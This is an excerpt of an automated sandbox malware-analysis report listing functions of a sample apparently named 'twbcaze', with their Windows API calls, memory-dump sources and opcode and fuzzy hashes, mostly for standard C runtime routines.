                                          • Opcode Fuzzy Hash: 5104fe00cea5b6b43bfce270a0a2c81ff317ca7eb47637b87448d486c4f4107a
                                          • Instruction Fuzzy Hash: 6CF036F0D64309BEEB147BF08CABB6DB6789F00701F104595BA40B61C3DA785A208EB9
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Function 0041BD43 Relevance: 1.5, APIs: 1, Instructions: 39memoryCOMMONLIBRARYCODE
                                          Download Yara Rule
                                          APIs
                                          • RtlAllocateHeap.NTDLL(00000008,00000000,00000000,?,0041B00A,00000001,00000364,00000005,000000FF,?,?,?,0041531C,0041ACE4,?), ref: 0041BD84
                                          Memory Dump Source
                                          • Source File: 00000006.00000002.353572062.0000000000401000.00000020.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                          • Associated: 00000006.00000002.353569749.0000000000400000.00000002.00000001.01000000.00000006.sdmpDownload File
                                          • Associated: 00000006.00000002.353575871.0000000000426000.00000002.00000001.01000000.00000006.sdmpDownload File
                                          • Associated: 00000006.00000002.353583167.0000000000430000.00000004.00000001.01000000.00000006.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_6_2_400000_twbcaze.jbxd
                                          Yara matches
                                          Similarity
                                          • API ID: AllocateHeap
                                          • String ID:
                                          • API String ID: 1279760036-0
                                          • Opcode ID: 4518dd0a2feec861e08341a654e625ee5977cd5c18c16e7c700ed9ce5b085929
                                          • Instruction ID: c559202f84c89cc676257c6e14c9c7052fb4074db409f4c442a073e6ba8dcb46
                                          • Opcode Fuzzy Hash: 4518dd0a2feec861e08341a654e625ee5977cd5c18c16e7c700ed9ce5b085929
                                          • Instruction Fuzzy Hash: F7F0E931640628A7DB296F22BC01BDF3758EF417A0B198127AC18D7290CB28DC8186EC
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Function 0041ACA1 Relevance: 1.5, APIs: 1, Instructions: 32memoryCOMMONLIBRARYCODE
                                          Download Yara Rule
                                          APIs
                                          • RtlAllocateHeap.NTDLL(00000000,?,?,?,0040E0E2,?,?,00401942,00000000,?,00401851), ref: 0041ACD3
                                          Memory Dump Source
                                          • Source File: 00000006.00000002.353572062.0000000000401000.00000020.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                          • Associated: 00000006.00000002.353569749.0000000000400000.00000002.00000001.01000000.00000006.sdmpDownload File
                                          • Associated: 00000006.00000002.353575871.0000000000426000.00000002.00000001.01000000.00000006.sdmpDownload File
                                          • Associated: 00000006.00000002.353583167.0000000000430000.00000004.00000001.01000000.00000006.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_6_2_400000_twbcaze.jbxd
                                          Yara matches
                                          Similarity
                                          • API ID: AllocateHeap
                                          • String ID:
                                          • API String ID: 1279760036-0
                                          • Opcode ID: 312f93da3f20f1bf995cafa9908406634ba9ab6ab0ad3f1a4bd5593490ff2293
                                          • Instruction ID: 6ad9cb94f8624884a5fba2963b8d04d3184dc4183697b6faf1641f4fbdd2e650
                                          • Opcode Fuzzy Hash: 312f93da3f20f1bf995cafa9908406634ba9ab6ab0ad3f1a4bd5593490ff2293
                                          • Instruction Fuzzy Hash: 4AE0ED3120262197DB213A6A9C04BDB3A48AF413A1F190167AC1497290FB68CCE1A2EF
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Function 0040F8C7 Relevance: 1.5, APIs: 1, Instructions: 8COMMON
                                          Download Yara Rule
                                          APIs
                                          • InitializeCriticalSectionEx.KERNELBASE(?,00000FA0,00000000), ref: 0040F8D5
                                          Memory Dump Source
                                          • Source File: 00000006.00000002.353572062.0000000000401000.00000020.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                          • Associated: 00000006.00000002.353569749.0000000000400000.00000002.00000001.01000000.00000006.sdmpDownload File
                                          • Associated: 00000006.00000002.353575871.0000000000426000.00000002.00000001.01000000.00000006.sdmpDownload File
                                          • Associated: 00000006.00000002.353583167.0000000000430000.00000004.00000001.01000000.00000006.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_6_2_400000_twbcaze.jbxd
                                          Yara matches
                                          Similarity
                                          • API ID: CriticalInitializeSection
                                          • String ID:
                                          • API String ID: 32694325-0
                                          • Opcode ID: 36b25f4602481f61584a5de2f85143af6d147a148cb4cdad9f560f8bbfb345e5
                                          • Instruction ID: 760cff598c0ffdcda0dee0a134f1822bc451b676202f3ab48e013d8b785bf01b
                                          • Opcode Fuzzy Hash: 36b25f4602481f61584a5de2f85143af6d147a148cb4cdad9f560f8bbfb345e5
                                          • Instruction Fuzzy Hash: 03B09270289248BEDF214B61FC06FB87F209B82740F50016AF54EA88F2C6A214629E0A
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Function 0040F8C8 Relevance: 1.5, APIs: 1, Instructions: 8COMMON
                                          Download Yara Rule
                                          APIs
                                          • InitializeCriticalSectionEx.KERNELBASE(?,00000FA0,00000000), ref: 0040F8D5
                                          Memory Dump Source
                                          • Source File: 00000006.00000002.353572062.0000000000401000.00000020.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                          • Associated: 00000006.00000002.353569749.0000000000400000.00000002.00000001.01000000.00000006.sdmpDownload File
                                          • Associated: 00000006.00000002.353575871.0000000000426000.00000002.00000001.01000000.00000006.sdmpDownload File
                                          • Associated: 00000006.00000002.353583167.0000000000430000.00000004.00000001.01000000.00000006.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_6_2_400000_twbcaze.jbxd
                                          Yara matches
                                          Similarity
                                          • API ID: CriticalInitializeSection
                                          • String ID:
                                          • API String ID: 32694325-0
                                          • Opcode ID: e131c9beb6c6debaa7ce301fc3837ef45f21eb32382bac0d7cf9ab0fc3dcdcfa
                                          • Instruction ID: 53b1aa524083811a7940a92cdcfe98958b27ed318f9b9838b95bcab2cc1fd6e0
                                          • Opcode Fuzzy Hash: e131c9beb6c6debaa7ce301fc3837ef45f21eb32382bac0d7cf9ab0fc3dcdcfa
                                          • Instruction Fuzzy Hash: 8CB0127038430CBBDE201B42FC06F647F1CDB42B50F800031F60C584F18BA27462598E
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Function 0023073A Relevance: 1.3, APIs: 1, Instructions: 60memoryCOMMON
                                          Download Yara Rule
                                          APIs
                                          • VirtualAlloc.KERNELBASE(00000000,17D78400,00003000,00000004), ref: 00230777
                                          Memory Dump Source
                                          • Source File: 00000006.00000002.353557579.0000000000230000.00000040.00001000.00020000.00000000.sdmp, Offset: 00230000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_6_2_230000_twbcaze.jbxd
                                          Yara matches
                                          Similarity
                                          • API ID: AllocVirtual
                                          • String ID:
                                          • API String ID: 4275171209-0
                                          • Opcode ID: fefa28e21f4d9309c1ecd3ac6253e750ecc73c234d91debfceddd181198d7f09
                                          • Instruction ID: 89578fef44c9edde2976b96be7d803d835a2fae15866aa791ca6f347d65c1efd
                                          • Opcode Fuzzy Hash: fefa28e21f4d9309c1ecd3ac6253e750ecc73c234d91debfceddd181198d7f09
                                          • Instruction Fuzzy Hash: 081106B0D10219AFDB04EFA8CC99BAEFBB4EB04304F208495E915B7291D2755A548FA4
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Non-executed Functions

                                          Function 0041FF3D Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 85COMMONLIBRARYCODE
                                          Download Yara Rule
                                          APIs
                                          • GetLocaleInfoW.KERNEL32(00000000,2000000B,0041F91C,00000002,00000000,?,?,?,0041F91C,?,00000000), ref: 0041FFD6
                                          • GetLocaleInfoW.KERNEL32(00000000,20001004,0041F91C,00000002,00000000,?,?,?,0041F91C,?,00000000), ref: 0041FFFF
                                          • GetACP.KERNEL32(?,?,0041F91C,?,00000000), ref: 00420014
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000006.00000002.353572062.0000000000401000.00000020.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                          • Associated: 00000006.00000002.353569749.0000000000400000.00000002.00000001.01000000.00000006.sdmpDownload File
                                          • Associated: 00000006.00000002.353575871.0000000000426000.00000002.00000001.01000000.00000006.sdmpDownload File
                                          • Associated: 00000006.00000002.353583167.0000000000430000.00000004.00000001.01000000.00000006.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_6_2_400000_twbcaze.jbxd
                                          Yara matches
                                          Similarity
                                          • API ID: InfoLocale
                                          • String ID: ACP$OCP
                                          • API String ID: 2299586839-711371036
                                          • Opcode ID: df216761bba3a61558e4d0c2f5230fed2d25ec901e075f517e6ef4b9634f3f20
                                          • Instruction ID: 1b401f6d518fe2f060409384912976397a41c3c398af64b9d02de9e00f52b45e
                                          • Opcode Fuzzy Hash: df216761bba3a61558e4d0c2f5230fed2d25ec901e075f517e6ef4b9634f3f20
                                          • Instruction Fuzzy Hash: 4921B372B00110AAEB34CF15E900BD7B3A6BB55B64B968437E806D7201E776DE87C368
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Function 0041F7D3 Relevance: 7.7, APIs: 5, Instructions: 183COMMONLIBRARYCODE
                                          Download Yara Rule
                                          APIs
                                            • Part of subcall function 0041AE68: GetLastError.KERNEL32(?,00000004,00000008,0041CF9A), ref: 0041AE6D
                                            • Part of subcall function 0041AE68: SetLastError.KERNEL32(00000000,00000005,000000FF), ref: 0041AF0B
                                            • Part of subcall function 0041AE68: _free.LIBCMT ref: 0041AECA
                                            • Part of subcall function 0041AE68: _free.LIBCMT ref: 0041AF00
                                          • GetUserDefaultLCID.KERNEL32(-00000002,00000000,?,00000055,?), ref: 0041F8DF
                                          • IsValidCodePage.KERNEL32(00000000), ref: 0041F928
                                          • IsValidLocale.KERNEL32(?,00000001), ref: 0041F937
                                          • GetLocaleInfoW.KERNEL32(?,00001001,-00000050,00000040,?,000000D0,00000055,00000000,?,?,00000055,00000000), ref: 0041F97F
                                          • GetLocaleInfoW.KERNEL32(?,00001002,00000030,00000040), ref: 0041F99E
                                          Memory Dump Source
                                          • Source File: 00000006.00000002.353572062.0000000000401000.00000020.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                          • Associated: 00000006.00000002.353569749.0000000000400000.00000002.00000001.01000000.00000006.sdmpDownload File
                                          • Associated: 00000006.00000002.353575871.0000000000426000.00000002.00000001.01000000.00000006.sdmpDownload File
                                          • Associated: 00000006.00000002.353583167.0000000000430000.00000004.00000001.01000000.00000006.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_6_2_400000_twbcaze.jbxd
                                          Yara matches
                                          Similarity
                                          • API ID: Locale$ErrorInfoLastValid_free$CodeDefaultPageUser
                                          • String ID:
                                          • API String ID: 949163717-0
                                          • Opcode ID: 4450b43d476ebd8749d984c17ed601da3922cdb14badebefc068301d31160f09
                                          • Instruction ID: 7e664b6f5e4f920847f2175219db3c0f79883923b7aa8754a8eb1c8ce9724d0e
                                          • Opcode Fuzzy Hash: 4450b43d476ebd8749d984c17ed601da3922cdb14badebefc068301d31160f09
                                          • Instruction Fuzzy Hash: 385172B1A00205AEEB10EFA5DC41BEB77B8BF04704F14447BE505E7291E778998ACB69
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Function 0040F709 Relevance: 6.1, APIs: 4, Instructions: 73COMMON
                                          Download Yara Rule
                                          APIs
                                          • IsProcessorFeaturePresent.KERNEL32(00000017), ref: 0040F715
                                          • IsDebuggerPresent.KERNEL32 ref: 0040F7E1
                                          • SetUnhandledExceptionFilter.KERNEL32 ref: 0040F801
                                          • UnhandledExceptionFilter.KERNEL32(?), ref: 0040F80B
                                          Memory Dump Source
                                          • Source File: 00000006.00000002.353572062.0000000000401000.00000020.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                          • Associated: 00000006.00000002.353569749.0000000000400000.00000002.00000001.01000000.00000006.sdmpDownload File
                                          • Associated: 00000006.00000002.353575871.0000000000426000.00000002.00000001.01000000.00000006.sdmpDownload File
                                          • Associated: 00000006.00000002.353583167.0000000000430000.00000004.00000001.01000000.00000006.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_6_2_400000_twbcaze.jbxd
                                          Yara matches
                                          Similarity
                                          • API ID: ExceptionFilterPresentUnhandled$DebuggerFeatureProcessor
                                          • String ID:
                                          • API String ID: 254469556-0
                                          • Opcode ID: 92d171cdb7cb6d76cddd416fc18485c383169333c85ecc22f5dfc94481a58bc5
                                          • Instruction ID: a2186bf3e758ef2dc04a5ba889b604cd713b75795d90941758fdbf2878431c07
                                          • Opcode Fuzzy Hash: 92d171cdb7cb6d76cddd416fc18485c383169333c85ecc22f5dfc94481a58bc5
                                          • Instruction Fuzzy Hash: 09311AB5D012189BDF60EFA5D9897CDBBB8BF08304F1041BAE40DA7290EB755A85CF49
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Function 0041FAC4 Relevance: 4.7, APIs: 3, Instructions: 205COMMON
                                          Download Yara Rule
                                          APIs
                                            • Part of subcall function 0041AE68: GetLastError.KERNEL32(?,00000004,00000008,0041CF9A), ref: 0041AE6D
                                            • Part of subcall function 0041AE68: SetLastError.KERNEL32(00000000,00000005,000000FF), ref: 0041AF0B
                                            • Part of subcall function 0041AE68: _free.LIBCMT ref: 0041AECA
                                            • Part of subcall function 0041AE68: _free.LIBCMT ref: 0041AF00
                                          • GetLocaleInfoW.KERNEL32(00000000,?,?,00000078), ref: 0041FB18
                                          • GetLocaleInfoW.KERNEL32(00000000,?,?,00000078), ref: 0041FB62
                                          • GetLocaleInfoW.KERNEL32(00000000,?,?,00000078), ref: 0041FC28
                                          Memory Dump Source
                                          • Source File: 00000006.00000002.353572062.0000000000401000.00000020.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                          • Associated: 00000006.00000002.353569749.0000000000400000.00000002.00000001.01000000.00000006.sdmpDownload File
                                          • Associated: 00000006.00000002.353575871.0000000000426000.00000002.00000001.01000000.00000006.sdmpDownload File
                                          • Associated: 00000006.00000002.353583167.0000000000430000.00000004.00000001.01000000.00000006.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_6_2_400000_twbcaze.jbxd
                                          Yara matches
                                          Similarity
                                          • API ID: InfoLocale$ErrorLast_free
                                          • String ID:
                                          • API String ID: 3140898709-0
                                          • Opcode ID: c9e66a47e9dcce08395d24c0a0bc0a7c348b3432911b7095e2b59eef629d9b1c
                                          • Instruction ID: 65ecd40137fe6b4f3b18d46bc5ae155ef0a382def28203f71d6c2093bf5f65f3
                                          • Opcode Fuzzy Hash: c9e66a47e9dcce08395d24c0a0bc0a7c348b3432911b7095e2b59eef629d9b1c
                                          • Instruction Fuzzy Hash: 8A61627150421B9BDB249F25D892BE677A8FF04314F14807BED06C6285F738E9C6DB58
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Function 004156E6 Relevance: 4.6, APIs: 3, Instructions: 77COMMONLIBRARYCODE
                                          Download Yara Rule
                                          APIs
                                          • IsDebuggerPresent.KERNEL32(?,?,?,?,?,?), ref: 004157DE
                                          • SetUnhandledExceptionFilter.KERNEL32 ref: 004157E8
                                          • UnhandledExceptionFilter.KERNEL32(0040E790), ref: 004157F5
                                          Memory Dump Source
                                          • Source File: 00000006.00000002.353572062.0000000000401000.00000020.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                          • Associated: 00000006.00000002.353569749.0000000000400000.00000002.00000001.01000000.00000006.sdmpDownload File
                                          • Associated: 00000006.00000002.353575871.0000000000426000.00000002.00000001.01000000.00000006.sdmpDownload File
                                          • Associated: 00000006.00000002.353583167.0000000000430000.00000004.00000001.01000000.00000006.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_6_2_400000_twbcaze.jbxd
                                          Yara matches
                                          Similarity
                                          • API ID: ExceptionFilterUnhandled$DebuggerPresent
                                          • String ID:
                                          • API String ID: 3906539128-0
                                          • Opcode ID: 66b54a4f5fa8bd941c2e71a588356a4736ee2f5a83fa318b13daa1e7aeff5363
                                          • Instruction ID: 0dde07209dfff96d70bba044140d6ead9c002d577b93866162e4f22fccfde345
                                          • Opcode Fuzzy Hash: 66b54a4f5fa8bd941c2e71a588356a4736ee2f5a83fa318b13daa1e7aeff5363
                                          • Instruction Fuzzy Hash: E831C6B4901218EBCB21EF65D9897CDBBB4BF48310F5045EAE41CA72A0E7749F858F49
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Function 004132A3 Relevance: 4.5, APIs: 3, Instructions: 20COMMONLIBRARYCODE
                                          Download Yara Rule
                                          APIs
                                          • GetCurrentProcess.KERNEL32(0040E8B6,?,0041335B,00000004,00000000,0040E8B6,00000004,0040E8B6,00000000), ref: 004132C5
                                          • TerminateProcess.KERNEL32(00000000,?,0041335B,00000004,00000000,0040E8B6,00000004,0040E8B6,00000000), ref: 004132CC
                                          • ExitProcess.KERNEL32 ref: 004132DE
                                          Memory Dump Source
                                          • Source File: 00000006.00000002.353572062.0000000000401000.00000020.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                          • Associated: 00000006.00000002.353569749.0000000000400000.00000002.00000001.01000000.00000006.sdmpDownload File
                                          • Associated: 00000006.00000002.353575871.0000000000426000.00000002.00000001.01000000.00000006.sdmpDownload File
                                          • Associated: 00000006.00000002.353583167.0000000000430000.00000004.00000001.01000000.00000006.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_6_2_400000_twbcaze.jbxd
                                          Yara matches
                                          Similarity
                                          • API ID: Process$CurrentExitTerminate
                                          • String ID:
                                          • API String ID: 1703294689-0
                                          • Opcode ID: e9f30ef7f058bfcb92595cb5ecd326114696ab5173aaa3a0b9c26b3da9d31081
                                          • Instruction ID: 669fa4add18d7d506d1f369d8e27cfdf62f79ebbebf5758064ee3c4fa42b6d56
                                          • Opcode Fuzzy Hash: e9f30ef7f058bfcb92595cb5ecd326114696ab5173aaa3a0b9c26b3da9d31081
                                          • Instruction Fuzzy Hash: 32E0EC71201248AFCF217F56DD099C93B69FF45752B804466F80596232CB79EED2CB8C
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Function 0040F496 Relevance: 1.6, APIs: 1, Instructions: 147COMMON
                                          Download Yara Rule
                                          APIs
                                          • IsProcessorFeaturePresent.KERNEL32(0000000A), ref: 0040F4AC
                                          Memory Dump Source
                                          • Source File: 00000006.00000002.353572062.0000000000401000.00000020.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                          • Associated: 00000006.00000002.353569749.0000000000400000.00000002.00000001.01000000.00000006.sdmpDownload File
                                          • Associated: 00000006.00000002.353575871.0000000000426000.00000002.00000001.01000000.00000006.sdmpDownload File
                                          • Associated: 00000006.00000002.353583167.0000000000430000.00000004.00000001.01000000.00000006.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_6_2_400000_twbcaze.jbxd
                                          Yara matches
                                          Similarity
                                          • API ID: FeaturePresentProcessor
                                          • String ID:
                                          • API String ID: 2325560087-0
                                          • Opcode ID: e18d4502850a283a2bc9f2affa6179b4a73d75b53ed98199151f2e822a03349d
                                          • Instruction ID: 25393b13f6cf6b1be926e12024bfbac8d582d53e7fc82ae2a865a5802fcf0590
                                          • Opcode Fuzzy Hash: e18d4502850a283a2bc9f2affa6179b4a73d75b53ed98199151f2e822a03349d
                                          • Instruction Fuzzy Hash: 3051B0B1A102159FDB24CF69D9817AABBF0FB48714F24C43AC404EB3A0E379A904CF58
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Function 0041FD76 Relevance: 1.6, APIs: 1, Instructions: 83COMMON
                                          Download Yara Rule
                                          APIs
                                            • Part of subcall function 0041AE68: GetLastError.KERNEL32(?,00000004,00000008,0041CF9A), ref: 0041AE6D
                                            • Part of subcall function 0041AE68: SetLastError.KERNEL32(00000000,00000005,000000FF), ref: 0041AF0B
                                            • Part of subcall function 0041AE68: _free.LIBCMT ref: 0041AECA
                                            • Part of subcall function 0041AE68: _free.LIBCMT ref: 0041AF00
                                          • GetLocaleInfoW.KERNEL32(00000000,?,?,00000078), ref: 0041FDCA
                                          Memory Dump Source
                                          • Source File: 00000006.00000002.353572062.0000000000401000.00000020.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                          • Associated: 00000006.00000002.353569749.0000000000400000.00000002.00000001.01000000.00000006.sdmpDownload File
                                          • Associated: 00000006.00000002.353575871.0000000000426000.00000002.00000001.01000000.00000006.sdmpDownload File
                                          • Associated: 00000006.00000002.353583167.0000000000430000.00000004.00000001.01000000.00000006.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_6_2_400000_twbcaze.jbxd
                                          Yara matches
                                          Similarity
                                          • API ID: ErrorLast_free$InfoLocale
                                          • String ID:
                                          • API String ID: 2003897158-0
                                          • Opcode ID: ca4cc948e7cac62821100280396542b5b8790cd7ca5c2616e5165290a72708b7
                                          • Instruction ID: 10d55a3d9dcdfbb2ee4bf10709a2db1c01cb4fc842f04bee9b6b8bffb745b34f
                                          • Opcode Fuzzy Hash: ca4cc948e7cac62821100280396542b5b8790cd7ca5c2616e5165290a72708b7
                                          • Instruction Fuzzy Hash: 0121B672611306ABDB289A25DC41AFB77A8EF04318F10407FFD06D6252E738AD86C759
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Function 0041FA29 Relevance: 1.6, APIs: 1, Instructions: 63COMMONLIBRARYCODE
                                          Download Yara Rule
                                          APIs
                                            • Part of subcall function 0041AE68: GetLastError.KERNEL32(?,00000004,00000008,0041CF9A), ref: 0041AE6D
                                            • Part of subcall function 0041AE68: SetLastError.KERNEL32(00000000,00000005,000000FF), ref: 0041AF0B
                                          • EnumSystemLocalesW.KERNEL32(0041FAC4,00000001,00000000,?,-00000050,?,0041F8B3,00000000,-00000002,00000000,?,00000055,?), ref: 0041FA9B
                                          Memory Dump Source
                                          • Source File: 00000006.00000002.353572062.0000000000401000.00000020.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                          • Associated: 00000006.00000002.353569749.0000000000400000.00000002.00000001.01000000.00000006.sdmpDownload File
                                          • Associated: 00000006.00000002.353575871.0000000000426000.00000002.00000001.01000000.00000006.sdmpDownload File
                                          • Associated: 00000006.00000002.353583167.0000000000430000.00000004.00000001.01000000.00000006.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_6_2_400000_twbcaze.jbxd
                                          Yara matches
                                          Similarity
                                          • API ID: ErrorLast$EnumLocalesSystem
                                          • String ID:
                                          • API String ID: 2417226690-0
                                          • Opcode ID: 24d9f12c9ff9318025bbd53b0fa2a750c21dd6420c05e1eb61f8585562132174
                                          • Instruction ID: 33417a5631a89835e57847a0522a29cad8df5ea76d98ba4df800e8099a0f39a2
                                          • Opcode Fuzzy Hash: 24d9f12c9ff9318025bbd53b0fa2a750c21dd6420c05e1eb61f8585562132174
                                          • Instruction Fuzzy Hash: 5111C63B2007015FDB18AF39C8916BAB792FF84358B58443EE98A47B40D379B947C744
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Function 0041FE96 Relevance: 1.6, APIs: 1, Instructions: 63COMMON
                                          Download Yara Rule
                                          APIs
                                            • Part of subcall function 0041AE68: GetLastError.KERNEL32(?,00000004,00000008,0041CF9A), ref: 0041AE6D
                                            • Part of subcall function 0041AE68: SetLastError.KERNEL32(00000000,00000005,000000FF), ref: 0041AF0B
                                            • Part of subcall function 0041AE68: _free.LIBCMT ref: 0041AECA
                                            • Part of subcall function 0041AE68: _free.LIBCMT ref: 0041AF00
                                          • GetLocaleInfoW.KERNEL32(00000000,?,?,00000078), ref: 0041FEEA
                                          Memory Dump Source
                                          • Source File: 00000006.00000002.353572062.0000000000401000.00000020.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                          • Associated: 00000006.00000002.353569749.0000000000400000.00000002.00000001.01000000.00000006.sdmpDownload File
                                          • Associated: 00000006.00000002.353575871.0000000000426000.00000002.00000001.01000000.00000006.sdmpDownload File
                                          • Associated: 00000006.00000002.353583167.0000000000430000.00000004.00000001.01000000.00000006.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_6_2_400000_twbcaze.jbxd
                                          Yara matches
                                          Similarity
                                          • API ID: ErrorLast_free$InfoLocale
                                          • String ID:
                                          • API String ID: 2003897158-0
                                          • Opcode ID: 073bf57e617ead7743a03dbd9fae7aa9d6ccc20203289cd0083fcc093794edca
                                          • Instruction ID: d06322da41f1ea895bfa6be50a63a5708ed325d3cac85478186cb447edbad442
                                          • Opcode Fuzzy Hash: 073bf57e617ead7743a03dbd9fae7aa9d6ccc20203289cd0083fcc093794edca
                                          • Instruction Fuzzy Hash: AF11C672601216ABDB14AB65DC42AFA73E8EF09314B10407FF901D7241EBBCED86C758
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Function 00420043 Relevance: 1.5, APIs: 1, Instructions: 45COMMON
                                          Download Yara Rule
                                          APIs
                                            • Part of subcall function 0041AE68: GetLastError.KERNEL32(?,00000004,00000008,0041CF9A), ref: 0041AE6D
                                            • Part of subcall function 0041AE68: SetLastError.KERNEL32(00000000,00000005,000000FF), ref: 0041AF0B
                                          • GetLocaleInfoW.KERNEL32(?,20000001,?,00000002,?,00000000,?,?,0041FCE0,00000000,00000000,?), ref: 0042006F
                                          Memory Dump Source
                                          • Source File: 00000006.00000002.353572062.0000000000401000.00000020.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                          • Associated: 00000006.00000002.353569749.0000000000400000.00000002.00000001.01000000.00000006.sdmpDownload File
                                          • Associated: 00000006.00000002.353575871.0000000000426000.00000002.00000001.01000000.00000006.sdmpDownload File
                                          • Associated: 00000006.00000002.353583167.0000000000430000.00000004.00000001.01000000.00000006.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_6_2_400000_twbcaze.jbxd
                                          Yara matches
                                          Similarity
                                          • API ID: ErrorLast$InfoLocale
                                          • String ID:
                                          • API String ID: 3736152602-0
                                          • Opcode ID: 18fdc5c88f8a52bb8aa12cdd676a1fb474123b5ac98d72e7010630e7c620e3f3
                                          • Instruction ID: c67510dd7e706448ece52ebd5ecb31bc795c76781afd46c53c550107c917c88e
                                          • Opcode Fuzzy Hash: 18fdc5c88f8a52bb8aa12cdd676a1fb474123b5ac98d72e7010630e7c620e3f3
                                          • Instruction Fuzzy Hash: 66F0F9327001216BEB285665A805BBB77E4EB40754F44442AED46A3242EA38FD41C694
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Function 0041FD17 Relevance: 1.5, APIs: 1, Instructions: 41COMMONLIBRARYCODE
                                          Download Yara Rule
                                          APIs
                                            • Part of subcall function 0041AE68: GetLastError.KERNEL32(?,00000004,00000008,0041CF9A), ref: 0041AE6D
                                            • Part of subcall function 0041AE68: SetLastError.KERNEL32(00000000,00000005,000000FF), ref: 0041AF0B
                                          • EnumSystemLocalesW.KERNEL32(0041FD76,00000001,?,?,-00000050,?,0041F877,-00000050,-00000002,00000000,?,00000055,?,-00000050,?,?), ref: 0041FD61
                                          Memory Dump Source
                                          • Source File: 00000006.00000002.353572062.0000000000401000.00000020.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                          • Associated: 00000006.00000002.353569749.0000000000400000.00000002.00000001.01000000.00000006.sdmpDownload File
                                          • Associated: 00000006.00000002.353575871.0000000000426000.00000002.00000001.01000000.00000006.sdmpDownload File
                                          • Associated: 00000006.00000002.353583167.0000000000430000.00000004.00000001.01000000.00000006.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_6_2_400000_twbcaze.jbxd
                                          Yara matches
                                          Similarity
                                          • API ID: ErrorLast$EnumLocalesSystem
                                          • String ID:
                                          • API String ID: 2417226690-0
                                          • Opcode ID: 6ae71a939a11522df4327ded550d35403f0a03c9b9b2aeabd82d0e6ff0f994b9
                                          • Instruction ID: a5256b6c35e63d2cb6e3f0b65d5a0dd39432498f0cacc1524f5fae9b2dc4f453
                                          • Opcode Fuzzy Hash: 6ae71a939a11522df4327ded550d35403f0a03c9b9b2aeabd82d0e6ff0f994b9
                                          • Instruction Fuzzy Hash: FDF046763007041FCB246F39A881ABA7B91EF8036CF15853EFA464B690D3B9AC83C704
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Function 0041BC92 Relevance: 1.5, APIs: 1, Instructions: 33COMMONLIBRARYCODE
                                          Download Yara Rule
                                          APIs
                                            • Part of subcall function 00415904: EnterCriticalSection.KERNEL32(?,?,004134D6,00000000,0042F7D0,0000000C,0041348E,00000000,?,0041BD76,00000000,?,0041B00A,00000001,00000364,00000005), ref: 00415913
                                          • EnumSystemLocalesW.KERNEL32(0041BC85,00000001,0042FA90,0000000C,0041B69D,-00000050), ref: 0041BCCA
                                          Memory Dump Source
                                          • Source File: 00000006.00000002.353572062.0000000000401000.00000020.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                          • Associated: 00000006.00000002.353569749.0000000000400000.00000002.00000001.01000000.00000006.sdmpDownload File
                                          • Associated: 00000006.00000002.353575871.0000000000426000.00000002.00000001.01000000.00000006.sdmpDownload File
                                          • Associated: 00000006.00000002.353583167.0000000000430000.00000004.00000001.01000000.00000006.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_6_2_400000_twbcaze.jbxd
                                          Yara matches
                                          Similarity
